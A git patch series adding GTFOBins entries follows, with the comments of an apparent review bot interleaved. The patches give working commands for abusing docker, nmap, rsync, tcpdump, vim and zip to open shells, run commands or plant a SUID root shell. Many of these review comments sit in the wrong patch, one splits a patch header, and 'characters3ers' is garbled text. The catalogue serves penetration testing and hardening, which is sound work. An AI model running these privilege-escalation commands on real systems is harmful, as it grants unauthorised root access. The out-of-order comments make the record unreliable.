From 7219385a0528c897bdcf604e0fd6ede1700c0ff8 Mon Sep 17 00:00:00 2001
From: AlessandroZ
Date: Fri, 17 Aug 2018 17:16:09 +0200
Subject: [PATCH 1/6] add new ways
---
 _gtfobins/docker.md | 7 +++++++
 _gtfobins/nmap.md | 9 +++++++++
 _gtfobins/rsync.md | 9 +++++++++
 _gtfobins/tcpdump.md | 9 +++++++++
 _gtfobins/vim.md | 19 +++++++++++++++++++
 _gtfobins/zip.md | 11 +++++++++++
 6 files changed, 64 insertions(+)
 create mode 100644 _gtfobins/docker.md
 create mode 100644 _gtfobins/nmap.md
 create mode 100644 _gtfobins/rsync.md
 create mode 100644 _gtfobins/tcpdump.md
 create mode 100644 _gtfobins/vim.md
 create mode 100644 _gtfobins/zip.md
diff --git a/_gtfobins/docker.md b/_gtfobins/docker.md
new file mode 100644
index 0000000..1bc89b1
--- /dev/null
+++ b/_gtfobins/docker.md
@@ -0,0 +1,7 @@
+---
+functions:
+ execute-interactive:
+ - code: docker run -v /home/${USER}:/h_docs ubuntu bash -c "cp /bin/bash /h_docs/rootshell && chmod 4777 /h_docs/rootshell;" && ~/rootshell -p
+ sudo-enabled:
+ - code: sudo docker run -v /home/${USER}:/h_docs ubuntu bash -c "cp /bin/bash /h_docs/rootshell && chmod 4777 /h_docs/rootshell;" && ~/rootshell -p
+---
diff --git a/_gtfobins/nmap.md b/_gtfobins/nmap.md
new file mode 100644
index 0000000..d3632f5
--- /dev/null
+++ b/_gtfobins/nmap.md
@@ -0,0 +1,9 @@
+---
+functions:
+ execute-non-interactive:
+ - code: echo "os.execute('/bin/sh')" > /tmp/script.nse
+ nmap --script=/tmp/script.nse
+ sudo-enabled:
+ - code: echo "os.execute('/bin/sh')" > /tmp/script.nse
+ sudo nmap --script=/tmp/script.nse
+---
diff --git a/_gtfobins/rsync.md b/_gtfobins/rsync.md
new file mode 100644
index 0000000..79ff9e4
--- /dev/null
+++ b/_gtfobins/rsync.md
@@ -0,0 +1,9 @@
+---
+functions:
+ execute-non-interactive:
+ - code: echo "whoami > /tmp/whoami" > /tmp/tmpfile
+ rsync -e 'sh /tmp/tmpfile' /dev/null 127.0.0.1:/dev/null 2>/dev/null
+ sudo-enabled:
+ - code: echo "whoami > /tmp/whoami" > /tmp/tmpfile
+ sudo rsync -e 'sh /tmp/tmpfile' /dev/null 127.0.0.1:/dev/null 2>/dev/null
+---
diff --git a/_gtfobins/tcpdump.md b/_gtfobins/tcpdump.md
new file mode 100644
index 0000000..5c2165e
--- /dev/null
+++ b/_gtfobins/tcpdump.md
@@ -0,0 +1,9 @@
+---
+functions:
+ execute-non-interactive:
+ - code: echo "whoami > /tmp/whoami" > /tmp/tmpfile
+ tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z ./tmpfile -Z root
+ sudo-enabled:
+ - code: echo "whoami > /tmp/whoami" > /tmp/tmpfile
+ sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z ./tmpfile -Z root
+---
diff --git a/_gtfobins/vim.md b/_gtfobins/vim.md
new file mode 100644
index 0000000..fb45d0b
--- /dev/null
+++ b/_gtfobins/vim.md
@@ -0,0 +1,19 @@
+---
+functions:
+ execute-interactive:
+ - code: vim -c ':!/bin/sh'
+ - code: |
+ vim
+ :set shell=/bin/sh
+ :shell
+ file-write:
+ - code: |
+ vim file_to_write
+ w
+ file-read:
+ - code: vim file_to_read
+ suid-enabled:
+ - code: ./vim -c ':!/bin/sh -p'
+ sudo-enabled:
+ - code: sudo vim -c ':!/bin/sh'
+---
diff --git a/_gtfobins/zip.md b/_gtfobins/zip.md
new file mode 100644
index 0000000..9d3864f
--- /dev/null
+++ b/_gtfobins/zip.md
@@ -0,0 +1,11 @@
+---
+functions:
+ execute-interactive:
+ - code: echo "/bin/sh" > /tmp/run.sh
+ chmod +x /tmp/run.sh
+ zip z.zip * -T -TT /tmp/run.sh
+ sudo-enabled:
+ - code: echo "/bin/sh" > /tmp/run.sh
+ chmod +x /tmp/run.sh
+ sudo zip z.zip * -T -TT /tmp/run.sh
+---
From c20ade4551cbfadb6768b91ab018b7bd47158713 Mon Sep 17 00:00:00 2001
From: Andrea Cardaci
Date: Sun, 19 Aug 2018 09:40:37 +0200
Subject: [PATCH 2/6] Make docker disposable, use sh instead of bash and add description
---
 _gtfobins/docker.md | 16 ++++++++++++++--
 1 file changed, 14 insertions(+), 2 deletions(-)
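Review bot: In the vim.md hunk the file-write entry's second line reads `w`, while the sibling execute-interactive entry writes ex commands with their leading colon (`:set shell=/bin/sh`, `:shell`); without the colon `w` is a normal-mode motion, not the command that saves the buffer. I'd change that line to `:w` so both entries use the same notation. vim.md is not touched again in this series, so the inconsistency would survive to the end.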
diff --git a/_gtfobins/docker.md b/_gtfobins/docker.md
index 1bc89b1..c27e24c 100644
--- a/_gtfobins/docker.md
+++ b/_gtfobins/docker.md
@@ -1,7 +1,19 @@
 ---
+description: |
+ Exploit the fact that Docker runs as root to create a SUID binary on the host using a container. This requires the user to be privileged enough to run docker, i.e., being in the `docker` group.
+
+ This creates a SUID shell in the guest file system. Any other Linux images should work, e.g., `debian`.
 functions:
 execute-interactive:
- - code: docker run -v /home/${USER}:/h_docs ubuntu bash -c "cp /bin/bash /h_docs/rootshell && chmod 4777 /h_docs/rootshell;" && ~/rootshell -p
+ - code: |
+ docker run --rm -v /home/$USER:/h_docs ubuntu \
+ sh -c 'cp /bin/sh /h_docs/sh && chmod +s /h_docs/sh' && ~/sh -p
 sudo-enabled:
- - code: sudo docker run -v /home/${USER}:/h_docs ubuntu bash -c "cp /bin/bash /h_docs/rootshell && chmod 4777 /h_docs/rootshell;" && ~/rootshell -p
+ - code: |
+ sudo docker run --rm -v /home/$USER:/h_docs ubuntu \
+ sh -c 'cp /bin/sh /h_docs/sh && chmod +s /h_docs/sh' && ~/sh -p
+ suid-enabled:
+ - code: |
+ ./docker run --rm -v /home/$USER:/h_docs ubuntu \
+ sh -c 'cp /bin/sh /h_docs/sh && chmod +s /h_docs/sh' && ~/sh -p
 ---
From 7822ec33e88c24a0b16db48148ccb9f2848b9cf1 Mon Sep 17 00:00:00 2001
From: Andrea Cardaci
Date: Sun, 19 Aug 2018 09:52:24 +0200
Subject: [PATCH 3/6] Add suid, description and YAML fixes to nmap
---
 _gtfobins/nmap.md | 17 +++++++++++++----
 1 file changed, 13 insertions(+), 4 deletions(-)
diff --git a/_gtfobins/nmap.md b/_gtfobins/nmap.md
index d3632f5..cc93942 100644
--- a/_gtfobins/nmap.md
+++ b/_gtfobins/nmap.md
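Review bot: The second paragraph of the new description says the SUID shell is created "in the guest file system", which contradicts both the first sentence ("on the host") and the code, where `-v /home/$USER:/h_docs` bind-mounts the user's home directory so `/h_docs/sh` ends up on the host as `~/sh`. I'd reword it to `This creates a SUID shell in the host file system, via the bind-mounted home directory; the file outlives the container even with --rm.` The grammar nit `Any other Linux images should work` → `Any other Linux image should work` can go in the same edit.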
@@ -1,9 +1,18 @@
 ---
 functions:
 execute-non-interactive:
- - code: echo "os.execute('/bin/sh')" > /tmp/script.nse
- nmap --script=/tmp/script.nse
+ - description: Echoing of input characters3ers is disabled.
+ code: |
+ echo 'os.execute("/bin/sh")' > /tmp/script.nse
+ nmap --script=/tmp/script.nse
 sudo-enabled:
- - code: echo "os.execute('/bin/sh')" > /tmp/script.nse
- sudo nmap --script=/tmp/script.nse
+ - description: Echoing of input characters3ers is disabled.
+ code: |
+ echo 'os.execute("/bin/sh")' > /tmp/script.nse
+ sudo nmap --script=/tmp/script.nse
+ suid-enabled:
+ - description: Echoing of input characters3ers is disabled.
+ code: |
+ echo 'os.execute("/bin/sh -p")' > /tmp/script.nse
+ ./nmap --script=/tmp/script.nse
 ---
From acf29564cb554056c3439bbd97bc2d48abb5f28d Mon Sep 17 00:00:00 2001
From: Andrea Cardaci
Date: Sun, 19 Aug 2018 10:12:08 +0200
Subject: [PATCH 4/6] Simplify rsync and add interactive execute
---
 _gtfobins/rsync.md | 10 +++++-----
 1 file changed, 5 insertions(+), 5 deletions(-)
diff --git a/_gtfobins/rsync.md b/_gtfobins/rsync.md
index 79ff9e4..754d848 100644
--- a/_gtfobins/rsync.md
+++ b/_gtfobins/rsync.md
@@ -1,9 +1,9 @@
 ---
 functions:
- execute-non-interactive:
- - code: echo "whoami > /tmp/whoami" > /tmp/tmpfile
- rsync -e 'sh /tmp/tmpfile' /dev/null 127.0.0.1:/dev/null 2>/dev/null
+ execute-interactive:
+ - code: rsync -e 'bash -c "exec 10<&0 11>&1 0<&2 1>&2; sh -i"' 127.0.0.1:/dev/null
 sudo-enabled:
- - code: echo "whoami > /tmp/whoami" > /tmp/tmpfile
- sudo rsync -e 'sh /tmp/tmpfile' /dev/null 127.0.0.1:/dev/null 2>/dev/null
+ - code: sudo rsync -e 'bash -c "exec 10<&0 11>&1 0<&2 1>&2; sh -i"' 127.0.0.1:/dev/null
+ suid-enabled:
+ - code: ./rsync -e 'bash -p -c "exec 10<&0 11>&1 0<&2 1>&2; sh -i"' 127.0.0.1:/dev/null
 ---
From 2ff760e5605e6915a9ba100166645038a21534a6 Mon Sep 17 00:00:00 2001
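Review bot: All three new `description` values in nmap.md read `Echoing of input characters3ers is disabled.`, where `characters3ers` looks like a stray paste; each should read `Echoing of input characters is disabled.` The text is duplicated verbatim under execute-non-interactive, sudo-enabled and suid-enabled, so the fix has to be applied to all three entries. The YAML quoting change (single quotes around the `echo` argument, double quotes inside) looks correct.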
From: Andrea Cardaci
Date: Sun, 19 Aug 2018 10:31:04 +0200
Subject: [PATCH 5/6] Fix and simplify tcpdump
---
 _gtfobins/tcpdump.md | 18 +++++++++++++-----
 1 file changed, 13 insertions(+), 5 deletions(-)
diff --git a/_gtfobins/tcpdump.md b/_gtfobins/tcpdump.md
index 5c2165e..aa3368a 100644
--- a/_gtfobins/tcpdump.md
+++ b/_gtfobins/tcpdump.md
@@ -1,9 +1,17 @@
 ---
 functions:
 execute-non-interactive:
- - code: echo "whoami > /tmp/whoami" > /tmp/tmpfile
- tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z ./tmpfile -Z root
- sudo-enabled:
- - code: echo "whoami > /tmp/whoami" > /tmp/tmpfile
- sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z ./tmpfile -Z root
+ - code: |
+ COMMAND='id > /tmp/output'
+ TF=$(mktemp -u)
+ echo "$COMMAND" > $TF
+ chmod +x $TF
+ tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF
+ suid-enabled:
+ - code: |
+ COMMAND='id > /tmp/output'
+ TF=$(mktemp -u)
+ echo "$COMMAND" > $TF
+ chmod +x $TF
+ sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF
 ---
From f740b410cc6e80bde44c2a66f266801814207dc5 Mon Sep 17 00:00:00 2001
From: Andrea Cardaci
Date: Sun, 19 Aug 2018 11:26:08 +0200
Subject: [PATCH 6/6] Simplify zip and add suid-limited
---
 _gtfobins/zip.md | 16 ++++++++++------
 1 file changed, 10 insertions(+), 6 deletions(-)
diff --git a/_gtfobins/zip.md b/_gtfobins/zip.md
index 9d3864f..13f9031 100644
--- a/_gtfobins/zip.md
+++ b/_gtfobins/zip.md
@@ -1,11 +1,15 @@
 ---
 functions:
 execute-interactive:
- - code: echo "/bin/sh" > /tmp/run.sh
- chmod +x /tmp/run.sh
- zip z.zip * -T -TT /tmp/run.sh
+ - code: |
+ zip /tmp/x.zip /etc/hosts -T -TT 'sh #'
+ rm /tmp/x.zip
 sudo-enabled:
- - code: echo "/bin/sh" > /tmp/run.sh
- chmod +x /tmp/run.sh
- sudo zip z.zip * -T -TT /tmp/run.sh
+ - code: |
+ sudo zip /tmp/x.zip /etc/hosts -T -TT 'sh #'
+ sudo rm /tmp/x.zip
+ suid-limited:
+ - code: |
+ ./zip /tmp/x.zip /etc/hosts -T -TT 'sh #'
+ sudo rm /tmp/x.zip
 ---
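Review bot: The second entry in tcpdump.md is keyed `suid-enabled` but its last line runs `sudo tcpdump ...`, so it is the sudo case under the wrong label, and the `sudo-enabled` key removed by this hunk has no replacement. The key should read `sudo-enabled:` to match the command and the convention used elsewhere in this series, where `suid-enabled` entries invoke the relative `./binary`. The two code blocks in the hunk are otherwise identical, so the key is the only thing distinguishing them.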
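Review bot: The new `suid-limited` entry in zip.md cleans up with `sudo rm /tmp/x.zip`, which assumes sudo rights in a section whose premise is a SUID binary rather than sudo, and differs from the plain `rm /tmp/x.zip` of the execute-interactive entry above. If sudo is not part of the premise the line cannot be taken at face value, and the entry should either drop it or say that the (presumably root-owned) archive is left in /tmp. I'd settle it one way and keep the three entries' cleanup lines consistent with their own preconditions.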